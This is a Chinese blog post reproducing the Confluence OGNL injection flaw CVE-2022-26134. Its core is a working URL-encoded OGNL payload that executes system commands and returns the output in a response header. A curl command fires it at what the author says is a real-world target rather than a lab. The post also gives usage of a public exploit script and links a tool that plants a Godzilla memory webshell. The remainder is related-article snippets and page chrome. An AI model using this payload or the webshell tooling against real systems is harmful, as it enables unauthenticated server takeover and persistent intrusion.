Confluence OGNL注入漏洞复现(CVE-2022-26134)

最新推荐文章于 2024-05-16 10:23:10 发布
最新推荐文章于 2024-05-16 10:23:10 发布
阅读量1k 收藏 1
点赞数
文章标签: java apache 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014536801/article/details/126057143
版权

Confluence OGNL注入漏洞复现(CVE-2022-26134)

影响范围

Confluence Server&Data Center ≥ 1.3.0

Atlassian Confluence Server and Data Center <7.4.17
Atlassian Confluence Server and Data Center <7.13.7
Atlassian Confluence Server and Data Center <7.14.3
Atlassian Confluence Server and Data Center <7.15.2
Atlassian Confluence Server and Data Center <7.16.4
Atlassian Confluence Server and Data Center <7.17.4
Atlassian Confluence Server and Data Center <7.18.1

漏洞成因

Atlassian Confluence存在远程代码执行漏洞,2022年6月2日,Atlassian发布安全公告,公布了一个Confluence Server和Data Center中的远程代码执行漏洞。详细分析可参考:

https://www.anquanke.com/post/id/274026

漏洞利用

环境准备
名称IP
攻击机192.168.159.128
靶机xxx.xxx.xxx.xxx

此处的靶机是我在实战里遇到的,另外该漏洞vulhub还未曾引入。

靶机截图如下:

image-20220729145604908

漏洞复现
手动复现

POC:

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/

测试:

curl -vv "http://xxx.xxx.xxx.xxx:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/"

可以看到如下图所示:

image-20220729152043723

工具复现

准备好生成POC工具:cve-2022-26134.py

工具地址:https://github.com/Nwqda/CVE-2022-26134

然后执行下方的命令:

python cve-2022-26134.py "http://xxx.xxx.xxx.xxx:8090/" "id"

image-20220729152816186

可以看到此漏洞利用成功!

附:一键连接哥斯拉生成工具:https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL

云舒_YunShu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
confluence-html-to-md:Confluence 导出 html 到 Markdown 转换器
06-25
Confluence 导出 html 到 Markdown 转换器 安装 npm i -g princed/confluence-html-to-md 用法 在包含从 Confluence 导出confluence-html-to-md文件夹中运行confluence-html-to-md 。
[confluence插件] confluence-markdown-macro-1.6.24.jar
03-18
[confluence插件] confluence-markdown-macro-1.6.24.jar [confluence插件] confluence-markdown-macro-1.6.24.jar [confluence插件] confluence-markdown-macro-1.6.24.jar [confluence插件] confluence-markdown-macro-1.6.24.jar [confluence插件] confluence-markdown-macro-1.6.24.jar [confluence插件] confluence-markdown-macro-1.6.24.jar [confluence插件] confluence-markdown-macro-1.6.24.jar [confluence插件] confluence-markdown-macro-1.6.24.jar [confluence插件] confluence-markdown-macro-1.6.24.jar [confluence插件] confluence-markdo
[confluence插件] plugin-confluence-1.48.0
07-07
[confluence插件] plugin-confluence-1.48.0 [confluence插件] plugin-confluence-1.48.0 [confluence插件] plugin-confluence-1.48.0 [confluence插件] plugin-confluence-1.48.0 [confluence插件] plugin-confluence-1.48.0 [confluence插件] plugin-confluence-1.48.0 [confluence插件] plugin-confluence-1.48.0 [confluence插件] plugin-confluence-1.48.0 [confluence插件] plugin-confluence-1.48.0
Confluence OGNL表达式注入命令执行漏洞CVE-2022-26134)vulhub漏洞复现
qq_53003652的博客
07-18 236
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。进入安装页面,申请试用版许可证。在填写数据库信息的页面,PostgreSQL数据库地址为。PostgreSQL数据库地址为。,burpsuite抓包。
Confluence OGNL 注入 (CVE-2022-26134)
weixin_47515220的博客
09-26 1765
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于网络的企业 wiki。2022 年 6 月 2 日,Atlassian 发布了针对其 Confluence Server 和数据中心应用程序的安全公告,强调了一个严重严重的未经身份验证的远程代码执行漏洞OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。
cve-2022-26134漏洞复现_实战_Confluence最新rce漏洞
恒安嘉新66的博客
06-11 3359
Confluence最新rce漏洞cve-2022-26134漏洞复现,有时拿下Confluence比拿下域控还有用,本次存在OGNL 注入rce漏洞,这次漏洞范围几乎通杀。
Atlassian Confluence远程代码执行漏洞CVE-2022-26134
tpaer的博客
12-09 1507
之前看到过Confluence这个洞没太在意以为没什么人用,结果在自己公司遇到了,简单复现一下。
CVE-2022-26134Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 7523
CVE-2022-26134Confluence OGNL RCE 漏洞
confluence的几个高危漏洞复现
fly夏天的博客
12-06 3639
CVE-2021-26084 CVE-2022-26134 漏洞复现
漏洞分析|Atlassian Confluence Data Center & Server 存在访问控制缺陷漏洞 (CVE-2023-22515)
xuandaoren的博客
10-12 1115
Confluence 提供了一个集中式的团队协作环境,使团队成员能够共享文档、项目计划、任务列表、会议记录等信息,并进行实时协作和交流。Confluence Data Center 支持集群部署,可以在多个服务器上进行负载均衡,提高系统的容错性和性能。我们可以在下面看到,SetupCheckInterceptor将进行测试BootstrapUtils.getBootstrapManager().isSetupComplete()作为检查的一部分,以确定 Confluence 服务器是否已设置。
[confluence插件] confluence-markdown-macro-1.6.22.jar
07-07
[confluence插件] confluence-markdown-macro-1.6.22.jar [confluence插件] confluence-markdown-macro-1.6.22.jar [confluence插件] confluence-markdown-macro-1.6.22.jar [confluence插件] confluence-markdown-...
[confluence插件] confluence-questions-3.3.2
07-07
[confluence插件] confluence-questions-3.3.2 [confluence插件] confluence-questions-3.3.2 [confluence插件] confluence-questions-3.3.2 [confluence插件] confluence-questions-3.3.2 [confluence插件] ...
攻防实战之Confluence后利用
weixin_39251927的博客
11-16 1446
这边管理员密码是密文加密在数据库中,解不开,因此解决的思路是将管理员用户密码修改为已知明文密码的密文(这边不能直接在数据库中添加字段,关系型数据库在单表中添加一条字段可能会出现问题),登录上后台以后,添加用户并加入管理员组,最后将管理员密码还原。Confluence的后利用主要问题在于在Linux中搭建时,默认是Confluence用户权限,如下图所示,而confluence在linux中是没有写权限的,这也就是为什么有些人发现可以执行命令但是shell写不进去。至此admin的密码被改为了123123。
CVE-2022-26134(Confluence OGNL表达式注入)
m0_46377671的博客
06-06 909
CVE-2022-26134(Confluence OGNL表达式注入)
Java安全』Struts2 2.1.8.1 参数名OGNL注入漏洞S2-003复现与浅析
Ho1aAs‘s Blog
08-01 1065
Struts2解析参数名称使用了OGNL表达式,构建恶意OGNL表达式会造成注入
【风险预警】Confluence Wiki OGNL注入漏洞CVE-2022-26134
murphysec的博客
06-04 4505
6月4日,墨菲安全实验室监测发现Atlassian修复了Confluence Server 和 Confluence Data Center 中的OGNL注入漏洞。Atlassian Confluence是企业常用的wiki系统,攻击者无需认证可利用漏洞Confluence Server 或 Confluence Data Center 系统中执行任意代码。CVSS评分为9.8分,评级为严重,按照官方描述该漏洞受影响版本为:所有受支持的 Confluence Server 和 Confluence Dat
知识库协同confluence7.19安装
第九系艾文
09-07 3345
知识库协同confluence7.19安装
CVE-2022-26134 Confluence OGNL 注入复现及后利用
Love&Share
04-07 2279
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令攻击者提供的URI将被转换为namespace,然后该namespace将被转换为OGNL表达式进行计算(攻击者提供的url被间接转化成了OGNL表达式进行计算)
jar包增量更新分析
最新发布
junlaiyan的专栏
05-16 270
借助jdeps分析出jar包的增量文件
Confluence漏洞
07-28
Confluence漏洞是指在Confluence Server或Data Center的特定版本中存在的安全漏洞,攻击者可以通过构造恶意数据执行OGNL表达式进行注入攻击,最终控制服务器。\[1\]受影响的版本包括Confluence Server & Confluence ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值